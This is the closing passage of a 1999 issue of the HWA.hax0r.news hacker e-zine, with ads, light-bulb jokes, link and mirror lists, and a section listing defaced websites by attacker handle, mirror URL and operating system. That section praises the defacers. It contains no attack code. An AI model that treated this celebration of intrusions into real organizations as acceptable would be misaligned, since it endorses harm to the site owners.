For security-related information about Microsoft products, please visit the Microsoft Security Advisor web site at http://www.microsoft.com/security. @HWA -=----------=- -=----------=- -=----------=- -=----------=- O 0 o O O O 0 -=----------=- -=----------=- -=----------=- -=----------=- -=----------=- END of main news articles content... read on for ads, humour, hacked websites etc -=----------=- -=----------=- -=----------=- -=----------=- -=----------=- HWA.hax0r.news AD.S ADVERTI$ING. The HWA black market ADVERTISEMENT$. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ***************************************************************************** * * * ATTRITION.ORG http://www.attrition.org * * ATTRITION.ORG Advisory Archive, Hacked Page Mirror * * ATTRITION.ORG DoS Database, Crypto Archive * * ATTRITION.ORG Sarcasm, Rudeness, and More. * * * ***************************************************************************** www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.freekevi n.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnick.co m www.2600.com ########################################ww.2600.com www.freeke vin.com www.kev# Support 2600.com and the Free Kevin #.com www.kevinmitnick. com www.2600.co# defense fund site, visit it now! . # www.2600.com www.free kevin.com www.k# FREE KEVIN! #in.com www.kevinmitnic k.com www.2600.########################################om www.2600.com www.fre ekevin.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnic k.com www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.fre www.2600.com One of our sponsers, visit them now www.csoft.net * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * WWW.BIZTECHTV.COM/PARSE WEDNESDAYS AT 4:30PM EST, HACK/PHREAK CALL-IN WEBTV * * JOIN #PARSE FOR LIVE PARTICIPATION IN SHOW CHAT OR THE WEBCHAT, AND WEBBOARD* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * WWW.2600.COM OFF THE HOOK LIVE NETCAST'S TUES SIMULCAST ON WBAI IN NYC @8PM * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * ////////////////////////////////////////////////////////////////////////////// // To place an ad in this section simply type it up and email it to // // hwa@press,usmc.net, put AD! in the subject header please. - Ed // ////////////////////////////////////////////////////////////////////////////// @HWA HA.HA Humour and puzzles ...etc ~~~~~~~~~~~~~~~~~~~~~~~~~ Don't worry. worry a *lot* Send in submissions for this section please! ............ How many Windows programmers does it take to change a light bulb? 472, one to write WinGetLightBulbHandle, one to write WinQueryStatusLightBulb, one to write WinGetLightSwitchHandle..... How many managers does it take to change a light bulb? "We've formed a task force to study the problem and why light bulbs burn out, and figure out what, exactly, we, as supervisors, can do to make the bulbs work smarter, not harder." How many tech support people does it take to change a light bulb? "We have an exact copy of the light bulb here and it seems to be working fine.Can you tell me what kind of system you have? Okay, now exactly how dark is it? Okay, there could be four or five things wrong - have you tried the switch? How many Microsoft technicians does it take to change a light bulb? Three, two to hold the ladder and one to screw the bulb into the tap. How many Microsoft technicians does it take to change a light bulb? Eight: one to work the bulb and seven to make sure that Microsoft gets $2 for every light bulb ever changed anywhere in the world. How many Microsoft engineers does it take to change a light bulb? None, Bill Gates will just redefine MSDarkness(TM) as the new industry standard. How many Apple employees does it take to change a light bulb? 7, one to change the bulb and six to design the T - Shirt. How many Apple programmers does it take to change a light bulb? None, the light bulb will be obselete in six months anyway. How many testers does it take to change a light bulb? We just noticed that it was dark, we don't actually fix the problem. How many developers does it take to change a light bulb? "The light bulb works fine on the system in my office." How many C++ programmers does it take to change a light bulb? "Your'e still thinking procedurally. A properly designed light bulb object would inherit a change method from a generic light bulb class, so all you'd have to do is send a light bulb change message." . @HWA SITE.1 http://sik.kuntz.org/photon/ Pho's page, good info on OS fingerprinting can be found here, page recently updated with new scanning techniques added...check it out. @HWA H.W Hacked websites ~~~~~~~~~~~~~~~~ Note: The hacked site reports stay, especially with some cool hits by groups like *H.A.R.P, go get em boyz racism is a mugs game! - Ed * Hackers Against Racist Propaganda (See issue #7) Haven't heard from Catharsys in a while for those following their saga visit http://frey.rapidnet.com/~ptah/ for 'the story so far'... Thursday Rumours; contributed by Magnum 351 In the last 48 hours numerous underground sites hosted on free internet sites like Zoom, Tripod, GeoCities, AngelFire, and others have disappeared. It would appear that about forty of these sites have been the victim of anonymous emails to the administrators of these systems. It is not known who is targeting these sites for removal but some feel it is the work of one person who is attempting to remove the competition. Latest cracked pages courtesy of attrition.org [99.08.21] NT [HiP] duno.com (members.duno.com) [99.08.21] So [bl0w team] Small World Software (www.smallworld.com) [99.08.21] So [mozy] Satelindo (ID) (www.satelindo.co.id) [99.08.20] Li [HFH] HAQ (www.haq.nu) Hacked: http://www.nailed.com By: doofoo Mirror: http://www.attrition.org/mirror/attrition/com/www.nailed.com/ OS: FreeBSD Hacked: http://sgss.com By: DW Mirror: http://www.attrition.org/mirror/attrition/com/sgss.com/ OS: NT *Hacked: http://www.ucam.ac.ma By: Level Seven Mirror: http://www.attrition.org/mirror/attrition/ma/www.ucam.ac.ma OS: Linux *This is the first Web site to be defaced in the country of Morocco. Hacked: http://www.ravencomp.ie By: Unknown Mirror: http://www.attrition.org/mirror/attrition/ie/www.ravencomp.ie/ OS: Irix Hacked: http://www.ddd.hu By: 139_r00ted Mirror: http://www.attrition.org/mirror/attrition/hu/www.ddd.hu OS: NT Hacked: http://www.arodnet.com By: Infinity Mirror: http://www.attrition.org/mirror/attrition/com/www.arodnet.com/ OS: Solaris Hacked: http://lanpc11.ilf.dtu.dk By: Elfoscuro Mirror: http://www.attrition.org/mirror/attrition/dk/lanpc11.ilf.dtu.dk/ OS: NT #2 Lyrikal (www.lyrikal.com) Ford Gimsa Automotriz (www.fordgimsa.com.mx) Distribuidora Monterrey Comisionistas S.A. de C.V. (www.dimocom.com.mx) SubmitMaster (www.submitmaster.net) Illinois Natural History Survey (nuclear.hazard.uiuc.edu) God Hates Fags (www.godhatesfags.com) Now TV (www.nowtv.com) Symbiosis Centre for Management and Human Resource Development (www.scmhrd.edu) ABC Network (www.abc.com) ActiveZone (SG) (www.activezone.com.sg) Professor J. C. Sprott, Physics, University of Wisconsin (sprott.physics.wisc.edu) #2 Spartanburg County Public Libraries (www.spt.lib.sc.us) #1 Spartanburg County Public Libraries (www.spt.lib.sc.us) Fat Kid (www.fatkid.net) FX Interactive (www.fxnetwork.com) Sky Radio (www.sky-radio.com) Last Updated: 08/19/99 at 12:15 Professor J. C. Sprott, Physics, University of Wisconsin (sprott.physics.wisc.edu) #2 Spartanburg County Public Libraries (www.spt.lib.sc.us) #1 Spartanburg County Public Libraries (www.spt.lib.sc.us) Fat Kid (www.fatkid.net) FX Interactive (www.fxnetwork.com) Sky Radio (www.sky-radio.com) Pet Pro (www.pet-pro.com) NetSouth (www.netsouth.net) Trousers (www.trousers.org) SOS (www.s-o-s.org) Jailed (www.jailed.com) Iron Dragon (www.iron-dragon.com) Texas Community Database (www.community.tded.state.tx.us) Association of Centers for Engineering and Automation (www.acea.neva.ru) Vermont Business Assistance Network (www.dca.state.vt.us) Lebanon High School, New Hampshire (www.lebanon.k12.nh.us) Hacked: http://www.trousers.org By: CPW Mirror: http://www.attrition.org/mirror/attrition/org/www.trousers.org Hacked: http://www.riddleware.com By: Dr Nuker of the Pakistan Hacker Club Mirror: http://www.attrition.org/mirror/attrition/com/www.riddleware.com/ OS: Solaris Hacked: http://pepita.ead.anl.gov/ By: GEZONDHEID Mirror: http://www.attrition.org/mirror/attrition/gov/pepita.ead.anl.gov/ and more sites at the attrition cracked web sites mirror: http://www.attrition.org/mirror/attrition/index.html ------------------------------------------------------------------------- A.0 APPENDICES _________________________________________________________________________ A.1 PHACVW, sekurity, security, cyberwar links ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The links are no longer maintained in this file, there is now a links section on the http://welcome.to/HWA.hax0r.news/ url so check there for current links etc. The hack FAQ (The #hack/alt.2600 faq) http://www-personal.engin.umich.edu/~jgotts/underground/hack-faq.html Hacker's Jargon File (The quote file) http://www.lysator.liu.se/hackdict/split2/main_index.html New Hacker's Jargon File. http://www.tuxedo.org/~esr/jargon/ HWA.hax0r.news Mirror Sites around the world: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.attrition.org/hosted/hwa/ http://www.attrition.org/~modify/texts/zines/HWA/ http://www.hackunlimited.com/files/secu/papers/hwa/ ** NEW ** http://www.ducktank.net/hwa/issues.html. ** NEW ** http://www.alldas.de/hwaidx1.htm ** NEW ** http://www.csoft.net/~hwa/ http://www.digitalgeeks.com/hwa.*DOWN* http://members.tripod.com/~hwa_2k http://welcome.to/HWA.hax0r.news/ http://www.attrition.org/~modify/texts/zines/HWA/ http://archives.projectgamma.com/zines/hwa/. http://www.403-security.org/Htmls/hwa.hax0r.news.htm http://viper.dmrt.com/files/=E-Zines/HWA.hax0r.news/ http://hwa.hax0r.news.8m.com/ http://www.fortunecity.com/skyscraper/feature/103/ International links:(TBC) ~~~~~~~~~~~~~~~~~~~~~~~~~ Foreign correspondants and others please send in news site links that have security news from foreign countries for inclusion in this list thanks... - Ed Belgium.......: http://bewoner.dma.be/cum/ Brasil........: http://www.psynet.net/ka0z http://www.elementais.cjb.net Canada .......: http://www.hackcanada.com Columbia......: http://www.cascabel.8m.com http://www.intrusos.cjb.net Finland ........http://hackunlimited.com/ Germany ........http://www.alldas.de/ http://www.security-news.com/ Indonesia.....: http://www.k-elektronik.org/index2.html http://members.xoom.com/neblonica/ http://hackerlink.or.id/ Netherlands...: http://security.pine.nl/ Russia........: http://www.tsu.ru/~eugene/ Singapore.....: http://www.icepoint.com South Africa ...http://www.hackers.co.za http://www.hack.co.za http://www.posthuman.za.net Turkey........: http://www.trscene.org - Turkish Scene is Turkey's first and best security related e-zine. .za (South Africa) sites contributed by wyzwun tnx guy... Got a link for this section? email it to hwa@press.usmc.net and i'll review it and post it here if it merits it. @HWA -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=- --EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF-- © 1998, 1999 (c) Cruciphux/HWA.hax0r.news (R) { w00t } -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=- --EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF-- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=- [ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ] [45:6E:64]-[28:63:29:31:39:39:38:20:68:77:61:20:73:74:65:76:65]